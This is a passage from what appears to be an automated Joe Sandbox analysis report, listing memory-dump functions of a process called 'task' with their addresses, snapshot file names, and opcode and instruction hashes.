                                                      • Opcode Fuzzy Hash: eedc0d05ea70509fc1a3664c88415c4160801d6ad76f39e37037805abe2ca424
                                                      • Instruction Fuzzy Hash: 5AE0DFAAA1A243CBF25A273090BA2A523A19B27208B0598B5D44E4328ACC1EAC1606D4
                                                      Function 00007FFAAC4D0696 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8b778a61ca948ba511a22c59e34d32a2a227d822592e0ad729fb01b6f0b0579
                                                      • Instruction ID: ede9cdb5da0fa9b82177b69b42b10e04923c5c105f94e2258ed424d3c19be6b5
                                                      • Opcode Fuzzy Hash: d8b778a61ca948ba511a22c59e34d32a2a227d822592e0ad729fb01b6f0b0579
                                                      • Instruction Fuzzy Hash: 0FD0C9A3B8D6191A754C656C78070FC63C1C783134690513FD54B81AA7EC1F685301CD
                                                      Function 00007FFAAC4D655E Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2993b3ceee3eff4bc814d09571596d1ad01c451eefd81970a5cc96a424a401d0
                                                      • Instruction ID: 6328de8285d4a81e4aba04a7518d40353a99f0024b9c5f2a7df0c080bdd1f2de
                                                      • Opcode Fuzzy Hash: 2993b3ceee3eff4bc814d09571596d1ad01c451eefd81970a5cc96a424a401d0
                                                      • Instruction Fuzzy Hash: C1D01215E4D60A9BFF45FBB440092FD51A25F95304B90C93A901ED7186DC3C94044784
                                                      Function 00007FFAAC4D0CBB Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e1eb7f4371ed8cffef164ce40eeeabc8097a28a721d3ac189b4dc084e3ace8b
                                                      • Instruction ID: 1772713730efe32ba4290f59ade29554bbb8a4b1da0ff577bd0d3b4a74a3cc7b
                                                      • Opcode Fuzzy Hash: 5e1eb7f4371ed8cffef164ce40eeeabc8097a28a721d3ac189b4dc084e3ace8b
                                                      • Instruction Fuzzy Hash: 9ED0A723D0D5628BB51E619410692BC4D40DB52A18B15C17FE90F632E2DC085D150ADE
                                                      Function 00007FFAAC4C6DDE Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction ID: 80519e15799200b636bdf5292304f1dae48d83cf0ac7e333727b3f6daa1ac9d7
                                                      • Opcode Fuzzy Hash: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction Fuzzy Hash: 6CD012309191098FF71DEF64C0428DC7731FB45618F30666DD04B662A2D935A9058A88
                                                      Function 00007FFAAC4D42F5 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d82b66094ac72fb2d7b8d6e03b5c73d0e767979114d0d87d89550be26084b4bf
                                                      • Instruction ID: b61567e5b0646fb5799785fd46bcef827fa9be237433ac21b6da1a77e778fcc7
                                                      • Opcode Fuzzy Hash: d82b66094ac72fb2d7b8d6e03b5c73d0e767979114d0d87d89550be26084b4bf
                                                      • Instruction Fuzzy Hash: 94D0A760F1820687FAD07BEC844967E17B1EF42304B909533D00E9B689DD38E8050B84
                                                      Function 00007FFAAC4D435B Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 758d5e367591b9d865147fbce0c14f6f8995bbe04a866ffcebf81526d42d00d1
                                                      • Instruction ID: 62a3d99a1173636e8d8701cffe00c10300a4018477866f1a901183191a5052b6
                                                      • Opcode Fuzzy Hash: 758d5e367591b9d865147fbce0c14f6f8995bbe04a866ffcebf81526d42d00d1
                                                      • Instruction Fuzzy Hash: E1D0A762E0920A8BF651BF6C40592FC1791DB67218B54D032D01EB7385CE2CEC050BE4
                                                      Function 00007FFAAC4D4322 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e6fedef0171dfde4ba7e027f17902415657a7a29ef373bb8b6001a1065e8032c
                                                      • Instruction ID: df6a2c6e7e50d5b59230cb4a644addeedbf731a6678f47e27c59a8e054549f14
                                                      • Opcode Fuzzy Hash: e6fedef0171dfde4ba7e027f17902415657a7a29ef373bb8b6001a1065e8032c
                                                      • Instruction Fuzzy Hash: CFC08CE0E1C30A8BF781AF34809836E2A606B8A208F204038D009A6288CEBC6A100380
                                                      Function 00007FFAAC4C0C96 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction ID: 0a880604c8904fa9e2819539826a57fc054a1b4e4501e4b9aaae843c44c12088
                                                      • Opcode Fuzzy Hash: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction Fuzzy Hash: 98C09B3041D34787E77EDF1485577A4765DF705D08F30A01D998B0D1754A305311DA95